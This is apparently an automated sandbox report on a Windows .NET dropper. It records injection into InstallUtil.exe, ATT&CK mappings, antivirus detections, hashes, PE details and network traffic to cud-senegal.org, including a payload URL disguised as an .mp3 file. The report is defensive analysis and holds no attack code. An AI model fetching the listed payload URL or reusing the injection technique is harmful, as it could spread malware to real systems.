                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45C000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45E000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 70D008Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeQueries volume information: C:\Users\user\Desktop\TiOWA908TP.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		211
                Process Injection                		1
                Disable or Modify Tools                		OS Credential Dumping111
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                Process Injection                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture13
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets12
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                TiOWA908TP.exe19%VirustotalBrowse
                TiOWA908TP.exe100%AviraTR/Dropper.Gen
                TiOWA908TP.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://cud-senegal.org0%Avira URL Cloudsafe
                https://cud-senegal.org/post-postlogin/Gjflop.mp30%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cud-senegal.org
                		51.159.14.89
                		truefalse
                  		high
                  browser.events.data.msn.cn
                  		unknown
                  		unknownfalse
                    		high
                    ecn.dev.virtualearth.net
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://cud-senegal.org/post-postlogin/Gjflop.mp3false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netTiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpfalse
                        		high
                        https://github.com/mgravell/protobuf-netiTiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJTiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://cud-senegal.orgTiOWA908TP.exe, 00000000.00000002.1680699788.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://stackoverflow.com/q/11564914/23354;TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/2152978/23354TiOWA908TP.exe, 00000000.00000002.1696791914.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.1702774228.0000000006C60000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    51.159.14.89
                                    		cud-senegal.orgFrance
                                    		12876OnlineSASFRfalse

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1590837
                                    Start date and time:2025-01-14 15:09:33 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 5s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                    Run name:Potential for more IOCs and behavior
                                    Number of analysed new started processes analysed:25
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:TiOWA908TP.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:f1bbcbcf580673f86692045f0e6c1141.exe
                                    Detection:MAL
                                    Classification:mal88.evad.winEXE@4/0@3/1
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 89%
                                    • Number of executed functions: 313
                                    • Number of non-executed functions: 38
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 2.23.227.215, 2.23.227.208, 2.23.227.221, 2.19.97.170, 2.19.97.195, 2.23.240.183, 20.190.160.22, 20.190.160.17, 40.126.32.72, 40.126.32.74, 40.126.32.138, 20.190.160.20, 40.126.32.140, 40.126.32.68, 20.50.73.11, 2.23.242.162, 172.202.163.200, 4.245.163.56
                                    • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, client.wns.windows.com, ssl2.tiles.virtualearth.net.edgekey.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, img-s-msn-com.akamaized.net, www.tm.v4.a.prd.aadg.akadns.net, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, a1834.dscg2.akamai.net, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, otelrules.svc.static.microsoft, login.live.com, onedscolprdneu07.northeurope.cloudapp.azure.com, e4113.dscd.akamaiedge.net, global.asimov.events.data.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                    • Execution Graph export aborted for target InstallUtil.exe, PID 7164 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:10:36API Interceptor26x Sleep call for process: TiOWA908TP.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    OnlineSASFRhttp://aeromorning.comGet hashmaliciousUnknownBrowse
                                    • 212.129.3.113
                                    12E56QE1Fc.exeGet hashmaliciousAzorultBrowse
                                    • 51.15.142.235
                                    4.elfGet hashmaliciousUnknownBrowse
                                    • 51.158.21.37
                                    miori.sh4.elfGet hashmaliciousUnknownBrowse
                                    • 212.129.5.22
                                    https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
                                    • 163.172.240.109
                                    Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                    • 212.129.3.113
                                    Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                    • 212.129.3.112
                                    hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                    • 51.15.58.224

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):0.014109040332189342
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:TiOWA908TP.exe
                                    File size:104'857'600 bytes
                                    MD5:f1bbcbcf580673f86692045f0e6c1141
                                    SHA1:14b1bb7f931dad06ca86e7d1921a3dd09153fa49
                                    SHA256:019e924a0b82a0c448cb283cb72b47ad019ecc4de05fddbd41c983f704271c03
                                    SHA512:29e89a172b5ec38ccef22af821ef5b92d049d4dfb59751a77f6a6f1843343f199b3372e3a59bb795699c219c10721bcdd1671284657de11332c62cc0febb8fe9
                                    SSDEEP:1536:EA3d8vNhDwPJrB5I+IYcUUvs1R82opTiKZ6VQI:EAt8vNwrDI+sUK226/
                                    TLSH:4A381A81F35403B1F9AA0B3CA8A78A124B3A7DBB8D45FB4D184D72510F77792852375A
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.g................................. ........@.. ....................................`................................

                                    File Icon

                                    Icon Hash:3819386387c91919

                                    Static PE Info

                                    General

                                    Entrypoint:0x40a59e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x67864A11 [Tue Jan 14 11:27:13 2025 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa5540x4a.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x11ad2.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x85a40x8600b83b373dcedc444eaba999355bc881e1False0.48347131529850745data5.635715646525423IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0xc0000x11ad20x11c007e5c1e0a79afa2908d4b3c0e881f4bf7False0.21762213908450703data2.6460935023941827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1e0000xc0x2008c6ae808a6b411a0a0bf99753758292bFalse0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xc06c0x114b8Device independent bitmap graphic, 114 x 300 x 32, image size 68400, resolution 3779 x 3779 px/m0.21019198193111235
                                    RT_GROUP_ICON0x1d5600x14data1.15
                                    RT_VERSION0x1d5b00x2fcdata0.43848167539267013
                                    RT_MANIFEST0x1d8e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 14, 2025 15:10:38.001646996 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:38.001701117 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:38.001787901 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:38.136156082 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:38.136203051 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:38.776120901 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:38.828639030 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:38.848095894 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:38.848126888 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:38.849430084 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:38.849447012 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:38.849510908 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.336785078 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.336997986 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.391235113 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.391279936 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.438036919 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.604331017 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.604355097 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.604365110 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.604398012 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.604419947 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.604429007 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.604439020 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.604453087 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.604474068 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.604515076 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.611011982 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.611021996 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.611032009 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.611069918 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.611134052 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.611144066 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.611185074 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.691915989 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.691929102 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.691989899 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.692014933 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.692030907 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.692059040 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.692084074 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.699496984 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.699513912 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.699569941 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.699578047 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.699614048 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.699635029 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.701406956 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.701436043 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.701472998 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.701478958 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.701503992 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.701529980 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.703170061 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.703191042 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.703213930 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.703260899 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.703264952 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.703315020 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.782712936 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.782768965 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.782807112 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.782845974 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.782860041 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.782888889 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.790013075 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.790061951 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.790096045 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.790105104 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.790136099 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.790157080 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.790815115 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.790860891 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.790885925 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.790894032 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.790923119 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.790942907 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.791742086 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.791786909 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.791810036 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.791817904 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.791857958 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.791874886 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.860074043 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.860135078 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.860183001 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.860208988 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.860222101 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.860249996 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.873133898 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.873159885 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.873231888 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.873240948 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.873264074 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.873287916 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.880541086 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.880562067 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.880603075 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.880609035 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.880645990 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.880664110 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.880888939 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.880934000 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.880995035 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.881000042 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.881048918 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.881324053 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.881340981 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.881403923 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:39.881409883 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:39.881445885 CET49723443192.168.2.2551.159.14.89
